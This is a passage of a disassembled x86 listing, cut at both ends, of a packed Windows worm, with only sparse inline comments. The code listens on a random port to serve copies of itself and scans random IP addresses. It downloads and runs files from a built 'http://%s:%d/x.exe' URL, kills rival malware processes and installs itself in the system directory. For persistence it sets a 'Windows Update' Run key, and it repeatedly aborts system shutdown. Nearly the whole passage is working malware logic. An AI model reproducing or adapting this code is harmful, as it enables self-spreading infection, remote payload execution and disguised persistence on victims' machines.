                push    ebx                     ; hTemplateFile = NULL
                push    ebx                     ; dwFlagsAndAttributes = 0
                push    3                       ; OPEN_EXISTING
                push    ebx                     ; lpSecurityAttributes = NULL
                push    1                       ; FILE_SHARE_READ
                lea     eax, [ebp+var_130]
                push    80000000h               ; GENERIC_READ
                push    eax
                call    dword_310010C8 ; CreateFileA
                mov     esi, eax
                cmp     esi, 0FFFFFFFFh
                jnz     short loc_31001C84
                push    1
                call    dword_310010BC ; ExitThread
loc_31001C84:                           ; CODE XREF: sub_31001C18+62j
                push    ebx
                push    esi
                call    dword_310010C4 ; GetFileSize
                push    eax
                mov     dword_31004FC0, eax     ; size (overwritten with bytes read below)
                call    sub_31002680            ; allocate `size` bytes (result unchecked)
                pop     ecx
                mov     dword_31004FB8, eax
                lea     ecx, [ebp+var_4]
                push    ebx                     ; lpOverlapped = NULL
                push    ecx                     ; lpNumberOfBytesRead
                push    dword_31004FC0
                push    eax
                push    esi
                call    dword_310010C0 ; ReadFile  (result unchecked)
                mov     eax, [ebp+var_4]
                push    esi
                mov     dword_31004FC0, eax     ; = bytes read
                call    dword_31001098 ; CloseHandle
                push    ebx                     ; protocol = 0
                push    1                       ; SOCK_STREAM
                push    2                       ; AF_INET
                call    dword_31001158 ; socket
                push    10h
                mov     edi, eax                ; edi = listening socket (unchecked)
                pop     esi                     ; esi = 10h = sizeof(sockaddr_in)
                lea     eax, [ebp+var_18]
                push    esi
                push    ebx
                push    eax
                call    sub_31002B8C ; memset
                add     esp, 0Ch
                mov     [ebp+var_18], 2         ; AF_INET
                mov     [ebp+var_14], ebx       ; INADDR_ANY
loc_31001CE6:                           ; CODE XREF: sub_31001C18+E5j
                                        ; sub_31001C18+EDj ...
call dword_310010F8 ; rand add eax, 7D0h and eax, 1FFFh cmp al, bl mov dword_31004FCC, eax jz short loc_31001CE6 xor ecx, ecx mov cl, ah test cl, cl jz short loc_31001CE6 push eax call dword_31001160 ; ntohs mov [ebp+var_16], ax lea eax, [ebp+var_18] push esi push eax push edi call dword_31001140 ; bind test eax, eax jnz short loc_31001CE6 push 64h push edi call dword_31001144 ; listen mov [ebp+var_8], esi pop esi loc_31001D2F: ; CODE XREF: sub_31001C18+133j lea eax, [ebp+var_8] push eax lea eax, [ebp+var_28] push eax push edi call dword_31001148 ; accept push eax push offset sub_31001ADF call sub_310019B3 pop ecx pop ecx jmp short loc_31001D2F ; --------------------------------------------------------------------------- loc_31001D4D: ; CODE XREF: sub_31001C18+3Dj push ebx call dword_310010BC ; ExitThread pop edi xor eax, eax pop ebx leave retn 4 sub_31001C18 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31001D5C proc near ; CODE XREF: sub_31001E06:loc_31001EDEp var_190 = byte ptr -190h push ebp mov ebp, esp sub esp, 190h lea eax, [ebp+var_190] push esi mov esi, dword_3100113C push eax push 2 call esi ; WSAStartup lea eax, [ebp+var_190] push eax push 102h call esi ; WSAStartup pop esi leave retn sub_31001D5C endp ; --------------------------------------------------------------------------- loc_31001D88: ; CODE XREF: UPX1:31006C28j push 0 call dword_310010A0 ; GetModuleHandleA push offset aFtpupd_exe ; "ftpupd.exe" mov dword_31004FD0, eax call dword_310010D4 ; DeleteFileA call sub_3100195C push offset aUterm13 ; "uterm13" call sub_3100198A pop ecx mov dword_31004FC4, eax call dword_310010D0 ; RtlGetLastWin32Error cmp eax, 0B7h jnz short loc_31001DCA push 1 call dword_310010CC ; ExitProcess loc_31001DCA: ; CODE XREF: UPX0:31001DC0j call sub_310017C9 call sub_310023C8 call sub_31002542 push offset sub_31001E06 call sub_31001851 test eax, eax pop ecx jz short loc_31001DEF push 0 call sub_31001E06 
loc_31001DEF: ; CODE XREF: UPX0:31001DE6j xor eax, eax retn ; =============== S U B R O U T I N E ======================================= sub_31001DF2 proc near ; CODE XREF: sub_31001E06:loc_31001F07p ; sub_31001F41:loc_31001F5Ap ... push 0 push dword_31004FC8 call dword_310010D8 ; WaitForSingleObject neg eax sbb eax, eax inc eax retn sub_31001DF2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31001E06 proc near ; CODE XREF: UPX0:31001DEAp ; DATA XREF: UPX0:31001DD9o var_10 = dword ptr -10h var_C = dword ptr -0Ch var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31001180 push offset loc_31002BD0 mov eax, large fs:0 push eax mov large fs:0, esp push ecx push ecx push ebx push esi push edi push offset aU13x ; "u13x" xor edi, edi push edi push 1 push edi call dword_310010DC ; CreateEventA mov dword_31004FC8, eax mov [ebp+var_4], edi push offset aU10x ; "u10x" call sub_31001AAF mov [esp+0Ch+var_C], offset aU11x ; "u11x" call sub_31001AAF mov [esp+0Ch+var_C], offset aU12x ; "u12x" call sub_31001AAF mov [esp+0Ch+var_C], offset aU8 ; "u8" call sub_3100198A mov [esp+0Ch+var_C], offset aU9 ; "u9" call sub_3100198A mov [esp+0Ch+var_C], offset aU10 ; "u10" call sub_3100198A mov [esp+0Ch+var_C], offset aU11 ; "u11" call sub_3100198A mov [esp+0Ch+var_C], offset aU12 ; "u12" call sub_3100198A pop ecx cmp [ebp+arg_0], edi jz short loc_31001EDE push offset aWs2_32 ; "ws2_32" mov esi, dword_31001090 call esi ; LoadLibraryA push offset aWininet ; "wininet" call esi ; LoadLibraryA push offset aMsvcrt ; "msvcrt" call esi ; LoadLibraryA push offset aAdvapi32 ; "advapi32" call esi ; LoadLibraryA push offset aUser32 ; "user32" call esi ; LoadLibraryA push offset aUterm13 ; "uterm13" call sub_3100198A pop ecx mov dword_31004FC4, eax loc_31001EDE: ; CODE XREF: sub_31001E06+9Dj call sub_31001D5C push edi push offset sub_31001C18 call sub_31001999 push edi push offset 
loc_31002B40 call sub_31001999 push edi push offset loc_31002150 call sub_31001999 add esp, 18h loc_31001F07: ; CODE XREF: sub_31001E06+11Cj call sub_31001DF2 test eax, eax jnz short loc_31001F24 push edi call dword_31001018 ; AbortSystemShutdownA push 1388h call dword_31001080 ; Sleep jmp short loc_31001F07 ; --------------------------------------------------------------------------- loc_31001F24: ; CODE XREF: sub_31001E06+108j or [ebp+var_4], 0FFFFFFFFh call nullsub_1 xor eax, eax mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn 4 sub_31001E06 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31001F41 proc near ; DATA XREF: sub_31001FA5+55o ; sub_3100202D+6Ao ... var_1 = byte ptr -1 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx cmp byte ptr [ebp+arg_0], 7Fh jnz short loc_31001F50 push 1 pop eax jmp short locret_31001FA1 ; --------------------------------------------------------------------------- loc_31001F50: ; CODE XREF: sub_31001F41+8j mov al, byte ptr [ebp+arg_0+3] push ebx push esi mov [ebp+var_1], al xor bl, bl loc_31001F5A: ; CODE XREF: sub_31001F41+5Aj call sub_31001DF2 test eax, eax jnz short loc_31001F9D call sub_31001A99 test eax, eax jz short loc_31001F9D cmp [ebp+var_1], bl jz short loc_31001F96 mov byte ptr [ebp+arg_0+3], bl push [ebp+arg_0] call sub_31001262 movzx esi, word_31004FDC pop ecx call dword_310010F8 ; rand cdq idiv esi add edx, esi push edx call dword_31001080 ; Sleep loc_31001F96: ; CODE XREF: sub_31001F41+2Ej inc bl cmp bl, 0FFh jb short loc_31001F5A loc_31001F9D: ; CODE XREF: sub_31001F41+20j ; sub_31001F41+29j pop esi xor eax, eax pop ebx locret_31001FA1: ; CODE XREF: sub_31001F41+Dj leave retn 4 sub_31001F41 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31001FA5 proc near ; DATA XREF: 
sub_3100202D+7Eo ; UPX0:310021E5o arg_0 = dword ptr 8 push ebp mov ebp, esp cmp byte ptr [ebp+arg_0], 7Fh jnz short loc_31001FB3 push 1 pop eax jmp short loc_31002029 ; --------------------------------------------------------------------------- loc_31001FB3: ; CODE XREF: sub_31001FA5+7j push ebx push esi push edi call sub_3100195C mov esi, dword_310010F8 xor ebx, ebx loc_31001FC3: ; CODE XREF: sub_31001FA5+7Dj call sub_31001DF2 test eax, eax jnz short loc_31002024 call sub_31001A99 test eax, eax jz short loc_31002024 call esi ; rand mov byte ptr [ebp+arg_0+2], al call esi ; rand push offset dword_31004FD4 mov byte ptr [ebp+arg_0+3], al call dword_310010E0 ; InterlockedIncrement push [ebp+arg_0] call sub_31001262 test eax, eax pop ecx jnz short loc_31002006 push [ebp+arg_0] push offset sub_31001F41 call sub_310019B3 pop ecx pop ecx loc_31002006: ; CODE XREF: sub_31001FA5+50j movzx edi, word_31004FDC call esi ; rand cdq idiv edi add edx, edi push edx call dword_31001080 ; Sleep inc ebx cmp ebx, 8000h jl short loc_31001FC3 loc_31002024: ; CODE XREF: sub_31001FA5+25j ; sub_31001FA5+2Ej pop edi pop esi xor eax, eax pop ebx loc_31002029: ; CODE XREF: sub_31001FA5+Cj pop ebp retn 4 sub_31001FA5 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3100202D proc near ; DATA XREF: UPX0:310021FDo var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx call sub_3100195C call sub_31001DF2 test eax, eax jnz loc_310020E6 push ebx mov ebx, dword_31001080 push esi mov esi, dword_310010F8 push edi loc_31002053: ; CODE XREF: sub_3100202D+48j ; sub_3100202D+B0j call esi ; rand mov byte ptr [ebp+var_4+1], al call esi ; rand mov byte ptr [ebp+var_4+3], al call esi ; rand mov byte ptr [ebp+var_4+2], al loc_31002062: ; CODE XREF: sub_3100202D+3Cj call esi ; rand cmp al, 7Fh mov byte ptr [ebp+var_4], al jz short loc_31002062 call sub_31001A5A mov edi, [ebp+var_4] cmp edi, eax jz short loc_31002053 call 
sub_31001A99 test eax, eax jz short loc_310020BE push offset dword_31004FD4 call dword_310010E0 ; InterlockedIncrement push edi call sub_31001262 test eax, eax pop ecx jnz short loc_310020C5 push edi push offset sub_31001F41 call sub_310019B3 pop ecx mov [ebp+var_8], 4 pop ecx loc_310020AA: ; CODE XREF: sub_3100202D+8Dj push edi push offset sub_31001FA5 call sub_310019B3 dec [ebp+var_8] pop ecx pop ecx jnz short loc_310020AA jmp short loc_310020C5 ; --------------------------------------------------------------------------- loc_310020BE: ; CODE XREF: sub_3100202D+51j push 2710h call ebx ; Sleep loc_310020C5: ; CODE XREF: sub_3100202D+67j ; sub_3100202D+8Fj movzx edi, word_31004FDC call esi ; rand cdq idiv edi add edx, edi push edx call ebx ; Sleep call sub_31001DF2 test eax, eax jz loc_31002053 pop edi pop esi pop ebx loc_310020E6: ; CODE XREF: sub_3100202D+11j push 0 call dword_310010BC ; ExitThread xor eax, eax leave retn 4 sub_3100202D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_310020F4 proc near ; CODE XREF: UPX0:310021C2p ; UPX0:loc_31002228p var_50 = byte ptr -50h var_28 = byte ptr -28h push ebp mov ebp, esp sub esp, 50h push esi call sub_31001A5A push eax call dword_3100115C ; inet_ntoa mov esi, dword_31001078 push eax lea eax, [ebp+var_28] push eax call esi ; lstrcpyA push dword_31004FCC lea eax, [ebp+var_28] push eax lea eax, [ebp+var_50] push offset aHttpSDX_exe ; "http://%s:%d/x.exe" push eax call dword_3100111C ; wsprintfA add esp, 10h lea eax, [ebp+var_50] push eax push offset word_31004002 call esi ; lstrcpyA push offset byte_31004000 call dword_3100107C ; lstrlenA mov byte_31004000[eax], 0DFh pop esi leave retn sub_310020F4 endp ; --------------------------------------------------------------------------- loc_31002150: ; DATA XREF: sub_31001E06+F4o push ecx push ecx push ebx push ebp push esi xor ebx, ebx push edi mov dword_31004FD4, ebx call sub_31001A99 mov esi, dword_31001080 
mov edi, 1388h test eax, eax jnz short loc_3100217E loc_31002172: ; CODE XREF: UPX0:3100217Cj push edi call esi ; Sleep call sub_31001A99 test eax, eax jz short loc_31002172 loc_3100217E: ; CODE XREF: UPX0:31002170j lea eax, [esp+14h] push ebx push eax call dword_31001134 ; InternetGetConnectedState test byte ptr [esp+14h], 2 push 50h mov dword_31004FD8, ebx pop ebp mov word_31004FDC, 96h jz short loc_310021BB mov dword_31004FD8, 1 mov ebp, 15Eh mov word_31004FDC, 14h loc_310021BB: ; CODE XREF: UPX0:310021A1j call sub_31001A5A mov ebx, eax call sub_310020F4 cmp ebx, 100007Fh jz short loc_310021DC push ebx push offset sub_31001F41 call sub_310019B3 pop ecx pop ecx loc_310021DC: ; CODE XREF: UPX0:310021CDj mov dword ptr [esp+10h], 4 loc_310021E4: ; CODE XREF: UPX0:310021F5j push ebx push offset sub_31001FA5 call sub_310019B3 dec dword ptr [esp+18h] pop ecx pop ecx jnz short loc_310021E4 test ebp, ebp jle short loc_3100220C loc_310021FB: ; CODE XREF: UPX0:3100220Aj push 0 push offset sub_3100202D call sub_310019B3 pop ecx dec ebp pop ecx jnz short loc_310021FB loc_3100220C: ; CODE XREF: UPX0:310021F9j ; UPX0:31002218j ... 
call sub_31001A99 test eax, eax jz short loc_3100221A push edi call esi ; Sleep jmp short loc_3100220C ; --------------------------------------------------------------------------- loc_3100221A: ; CODE XREF: UPX0:31002213j ; UPX0:31002226j call sub_31001A99 test eax, eax jnz short loc_31002228 push edi call esi ; Sleep jmp short loc_3100221A ; --------------------------------------------------------------------------- loc_31002228: ; CODE XREF: UPX0:31002221j call sub_310020F4 jmp short loc_3100220C ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3100222F proc near ; CODE XREF: sub_310023C8+8Cp ; sub_31002542+11Ap arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax push 0F003Fh push 0 push [ebp+arg_4] push [ebp+arg_0] call dword_3100100C ; RegOpenKeyExA test eax, eax jnz short loc_31002262 push [ebp+arg_8] push [ebp+arg_4] call dword_31001010 ; RegDeleteValueA push [ebp+arg_4] call dword_31001014 ; RegCloseKey loc_31002262: ; CODE XREF: sub_3100222F+1Cj pop ebp retn sub_3100222F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31002264 proc near ; CODE XREF: sub_31001C18+33p ; sub_310023C8+7Dp ... 
var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push ecx mov eax, [ebp+arg_10] push esi mov [ebp+var_4], eax lea eax, [ebp+arg_10] push eax xor esi, esi push 0F003Fh push esi push [ebp+arg_4] push [ebp+arg_0] call dword_3100100C ; RegOpenKeyExA test eax, eax jz short loc_31002290 push 1 pop eax jmp short loc_310022BA ; --------------------------------------------------------------------------- loc_31002290: ; CODE XREF: sub_31002264+25j lea eax, [ebp+var_4] push eax lea eax, [ebp+arg_4] push [ebp+arg_C] push eax push esi push [ebp+arg_8] push [ebp+arg_10] call dword_31001008 ; RegQueryValueExA test eax, eax jz short loc_310022AF push 2 pop esi loc_310022AF: ; CODE XREF: sub_31002264+46j push [ebp+arg_10] call dword_31001014 ; RegCloseKey mov eax, esi loc_310022BA: ; CODE XREF: sub_31002264+2Aj pop esi leave retn sub_31002264 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_310022BD proc near ; CODE XREF: sub_31002476+96p ; sub_31002542+7Cp ... 
arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push esi xor esi, esi lea eax, [ebp+arg_4] push esi push eax push esi push 0F003Fh push esi push esi push esi push [ebp+arg_4] push [ebp+arg_0] call dword_31001000 ; RegCreateKeyExA test eax, eax jz short loc_310022E6 push 1 pop eax jmp short loc_3100230D ; --------------------------------------------------------------------------- loc_310022E6: ; CODE XREF: sub_310022BD+22j push [ebp+arg_10] push [ebp+arg_C] push 1 push esi push [ebp+arg_8] push [ebp+arg_4] call dword_31001004 ; RegSetValueExA test eax, eax jz short loc_31002302 push 2 pop esi loc_31002302: ; CODE XREF: sub_310022BD+40j push [ebp+arg_4] call dword_31001014 ; RegCloseKey mov eax, esi loc_3100230D: ; CODE XREF: sub_310022BD+27j pop esi pop ebp retn sub_310022BD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31002310 proc near ; CODE XREF: sub_310023C8+98p var_128 = dword ptr -128h var_120 = dword ptr -120h var_104 = byte ptr -104h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 128h push ebx mov ebx, [ebp+arg_0] push esi push ebx call dword_3100107C ; lstrlenA mov esi, eax dec esi test esi, esi jle loc_310023C4 loc_31002330: ; CODE XREF: sub_31002310+27j cmp byte ptr [esi+ebx], 5Ch jz short loc_31002339 dec esi jns short loc_31002330 loc_31002339: ; CODE XREF: sub_31002310+24j push 0 push 2 call sub_31002BE8 ; CreateToolhelp32Snapshot cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jz short loc_310023C4 push 128h lea eax, [ebp+var_128] push 0 push eax call sub_31002B8C ; memset add esp, 0Ch lea eax, [ebp+var_128] mov [ebp+var_128], 128h push eax push [ebp+arg_0] call sub_31002BE2 ; Process32First test eax, eax jz short loc_310023C4 lea esi, [esi+ebx+1] loc_31002381: ; CODE XREF: sub_31002310+B2j lea eax, [ebp+var_104] push eax push esi call dword_310010F4 ; strstr pop ecx test eax, eax pop ecx jz short 
loc_310023B1 push [ebp+var_120] push 0 push 1F0FFFh call dword_3100109C ; OpenProcess push 0 push eax call dword_31001070 ; TerminateProcess loc_310023B1: ; CODE XREF: sub_31002310+83j lea eax, [ebp+var_128] push eax push [ebp+arg_0] call sub_31002BDC ; Process32Next test eax, eax jnz short loc_31002381 loc_310023C4: ; CODE XREF: sub_31002310+1Aj ; sub_31002310+38j ... pop esi pop ebx leave retn sub_31002310 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_310023C8 proc near ; CODE XREF: UPX0:31001DCFp var_138 = byte ptr -138h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 138h push ebx push esi lea eax, [ebp+var_30] push edi mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager" mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter" mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service" mov [ebp+var_24], offset aBotLoader ; "Bot Loader" mov [ebp+var_20], offset aSystray ; "SysTray" mov [ebp+var_1C], offset aWinupdate ; "WinUpdate" mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service" mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe" mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service" mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13" mov [ebp+var_4], eax mov [ebp+var_8], 0Ah mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... 
mov esi, 80000002h loc_31002431: ; CODE XREF: sub_310023C8+A7j mov eax, [ebp+var_4] push 104h mov ebx, [eax] lea eax, [ebp+var_138] push eax push ebx push edi push esi call sub_31002264 add esp, 14h test eax, eax jnz short loc_31002468 push ebx push edi push esi call sub_3100222F lea eax, [ebp+var_138] push eax call sub_31002310 add esp, 10h loc_31002468: ; CODE XREF: sub_310023C8+87j add [ebp+var_4], 4 dec [ebp+var_8] jnz short loc_31002431 pop edi pop esi pop ebx leave retn sub_310023C8 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31002476 proc near ; CODE XREF: sub_31002542+D1p ; sub_31002542+132p var_78 = byte ptr -78h var_14 = byte ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 78h cmp [ebp+arg_0], 0 jz short loc_3100248B push [ebp+arg_0] call dword_310010D4 ; DeleteFileA loc_3100248B: ; CODE XREF: sub_31002476+Aj lea eax, [ebp+var_78] push 63h push eax call dword_31001058 ; GetSystemDirectoryA test eax, eax jz locret_31002540 push esi call dword_310010F8 ; rand and eax, 3 add eax, 5 push eax lea eax, [ebp+var_14] push eax call sub_310019D4 mov esi, dword_3100105C pop ecx pop ecx lea eax, [ebp+var_14] push offset a_exe ; ".exe" push eax call esi ; lstrcatA lea eax, [ebp+var_78] push offset asc_31004CAC ; "\\" push eax call esi ; lstrcatA lea eax, [ebp+var_14] push eax lea eax, [ebp+var_78] push eax call esi ; lstrcatA lea eax, [ebp+var_78] push 0 push eax push [ebp+arg_4] call dword_31001060 ; CopyFileA lea eax, [ebp+var_78] push eax call dword_3100107C ; lstrlenA inc eax push eax lea eax, [ebp+var_78] push eax push offset aWindowsUpdate ; "Windows Update" push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... 
push 80000002h call sub_310022BD add esp, 14h push dword_31004FC4 call dword_31001098 ; CloseHandle lea eax, [ebp+var_78] push 0 push eax call dword_31001064 ; WinExec push 1F4h call dword_31001080 ; Sleep push 0 call dword_310010CC ; ExitProcess pop esi locret_31002540: ; CODE XREF: sub_31002476+23j leave retn sub_31002476 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31002542 proc near ; CODE XREF: UPX0:31001DD4p var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_20 = byte ptr -20h push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi lea eax, [ebp+var_84] push 63h push eax push 0 call dword_31001050 ; GetModuleFileNameA test eax, eax jz loc_3100267B and dword_31004FE0, 0 lea eax, [ebp+var_20] push 1Dh push eax mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless" push offset aId ; "ID" mov esi, 80000002h push edi push esi call sub_31002264 add esp, 14h test eax, eax jz short loc_310025C8 call dword_310010F8 ; rand push 0Ah mov ebx, offset aDfashnzdsdl ; "dfashnzdsdl" cdq pop ecx idiv ecx add edx, ecx push edx push ebx call sub_310019D4 pop ecx pop ecx push ebx call dword_3100107C ; lstrlenA inc eax push eax push ebx push offset aId ; "ID" push edi push esi call sub_310022BD add esp, 14h jmp short loc_310025D7 ; --------------------------------------------------------------------------- loc_310025C8: ; CODE XREF: sub_31002542+4Dj lea eax, [ebp+var_20] push eax push offset aDfashnzdsdl ; "dfashnzdsdl" call dword_31001078 ; lstrcpyA loc_310025D7: ; CODE XREF: sub_31002542+84j lea eax, [ebp+var_E8] push 63h push eax push offset aWindowsUpdate ; "Windows Update" push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... 
push esi call sub_31002264 add esp, 14h test eax, eax jz short loc_3100261D push 2 push offset a1 ; "1" push offset aClient ; "Client" push edi push esi call sub_310022BD lea eax, [ebp+var_84] push eax push 0 call sub_31002476 add esp, 1Ch jmp short loc_3100267B ; --------------------------------------------------------------------------- loc_3100261D: ; CODE XREF: sub_31002542+B3j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call dword_31001054 ; lstrcmpiA test eax, eax jnz short loc_31002666 lea eax, [ebp+var_20] push 1Dh mov ebx, offset aClient ; "Client" push eax push ebx push edi push esi call sub_31002264 add esp, 14h test eax, eax jnz short loc_3100267B push ebx push edi push esi mov dword_31004FE0, 1 call sub_3100222F add esp, 0Ch jmp short loc_3100267B ; --------------------------------------------------------------------------- loc_31002666: ; CODE XREF: sub_31002542+F1j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call sub_31002476 pop ecx pop ecx loc_3100267B: ; CODE XREF: sub_31002542+1Fj ; sub_31002542+D9j ... pop edi pop esi pop ebx leave retn sub_31002542 endp ; =============== S U B R O U T I N E ======================================= sub_31002680 proc near ; CODE XREF: sub_31001C18+7Ap ; sub_310026A6+CAp ... 
arg_0 = dword ptr 4 push 4 push 1000h push [esp+8+arg_0] push 0 call dword_3100104C ; VirtualAlloc retn sub_31002680 endp ; =============== S U B R O U T I N E ======================================= sub_31002694 proc near ; CODE XREF: sub_310026A6+10Bp ; sub_31002A44+E1p arg_0 = dword ptr 4 push 8000h push 0 push [esp+8+arg_0] call dword_31001048 ; VirtualFree retn sub_31002694 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_310026A6 proc near ; CODE XREF: sub_31002928+102p var_110 = byte ptr -110h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 110h push ebx push esi xor esi, esi push edi push esi push esi push esi push 1 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_3100112C ; InternetOpenA mov ebx, eax cmp ebx, esi jnz short loc_310026D1 push 1 jmp loc_31002767 ; --------------------------------------------------------------------------- loc_310026D1: ; CODE XREF: sub_310026A6+22j lea eax, [ebp+var_110] push 104h push eax call dword_31001058 ; GetSystemDirectoryA mov edi, dword_3100105C lea eax, [ebp+var_110] push offset asc_31004CAC ; "\\" push eax call edi ; lstrcatA lea eax, [ebp+var_110] push 6 push eax call dword_3100107C ; lstrlenA lea eax, [ebp+eax+var_110] push eax call sub_310019D4 pop ecx lea eax, [ebp+var_110] pop ecx push offset a_exe ; ".exe" push eax call edi ; lstrcatA push esi push esi push 2 push esi push esi lea eax, [ebp+var_110] push 40000000h push eax call dword_310010C8 ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_31002747 push 2 jmp short loc_31002767 ; --------------------------------------------------------------------------- loc_31002747: ; CODE XREF: sub_310026A6+9Bj push esi push esi push esi push esi push [ebp+arg_0] push ebx call dword_31001128 ; InternetOpenUrlA cmp eax, esi mov [ebp+arg_0], eax jnz short loc_3100276A push [ebp+var_4] 
call dword_31001098 ; CloseHandle push 3 loc_31002767: ; CODE XREF: sub_310026A6+26j ; sub_310026A6+9Fj pop eax jmp short loc_310027BB ; --------------------------------------------------------------------------- loc_3100276A: ; CODE XREF: sub_310026A6+B4j mov edi, 100000h push edi call sub_31002680 mov ebx, eax pop ecx lea eax, [ebp+var_8] push eax push edi push ebx push [ebp+arg_0] call dword_31001124 ; InternetReadFile lea eax, [ebp+var_C] push esi push eax push [ebp+var_8] push ebx push [ebp+var_4] call dword_31001044 ; WriteFile push [ebp+var_4] call dword_31001098 ; CloseHandle lea eax, [ebp+var_110] push 5 push eax call sub_31001A04 push ebx call sub_31002694 add esp, 0Ch xor eax, eax loc_310027BB: ; CODE XREF: sub_310026A6+C2j pop edi pop esi pop ebx leave retn sub_310026A6 endp ; =============== S U B R O U T I N E ======================================= sub_310027C0 proc near ; CODE XREF: sub_31002928+9Dp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = byte ptr 0Ch mov ecx, [esp+arg_4] mov eax, [esp+arg_0] push ebx push esi push edi or edi, 0FFFFFFFFh inc eax push 0Fh lea esi, [ecx+1] sub edi, ecx pop ecx loc_310027D7: ; CODE XREF: sub_310027C0+56j mov dl, [eax] mov bl, [eax-1] add edx, ecx add bl, cl sar edx, 4 and dl, 3 sub dl, [esp+0Ch+arg_8] shl bl, 2 or dl, bl mov [esi-1], dl mov dl, [eax+1] mov bl, [eax] dec dl add bl, cl and dl, cl sub dl, [esp+0Ch+arg_8] add eax, 3 shl bl, 4 and bl, 0F0h or dl, bl mov [esi], dl inc esi inc esi lea edx, [edi+esi] cmp edx, 30h jl short loc_310027D7 pop edi pop esi pop ebx retn sub_310027C0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3100281C proc near ; CODE XREF: sub_310028A1+27p var_38 = byte ptr -38h var_1C = byte ptr -1Ch arg_0 = byte ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 38h push ebx push esi push edi push 6 pop ecx mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ" lea edi, [ebp+var_1C] push 6 rep movsd 
movsw movsb pop ecx mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz" lea edi, [ebp+var_38] mov ebx, [ebp+arg_4] rep movsd movsw test ebx, ebx movsb jge short loc_3100284F add ebx, 1Ah loc_3100284F: ; CODE XREF: sub_3100281C+2Ej movsx edi, [ebp+arg_0] mov esi, dword_310010EC lea eax, [ebp+var_1C] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31002879 lea ecx, [ebp+var_1C] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_1C] jmp short loc_3100289C ; --------------------------------------------------------------------------- loc_31002879: ; CODE XREF: sub_3100281C+48j lea eax, [ebp+var_38] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31002899 lea ecx, [ebp+var_38] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_38] jmp short loc_3100289C ; --------------------------------------------------------------------------- loc_31002899: ; CODE XREF: sub_3100281C+68j mov al, [ebp+arg_0] loc_3100289C: ; CODE XREF: sub_3100281C+5Bj ; sub_3100281C+7Bj pop edi pop esi pop ebx leave retn sub_3100281C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_310028A1 proc near ; CODE XREF: sub_31002928+8Bp arg_0 = dword 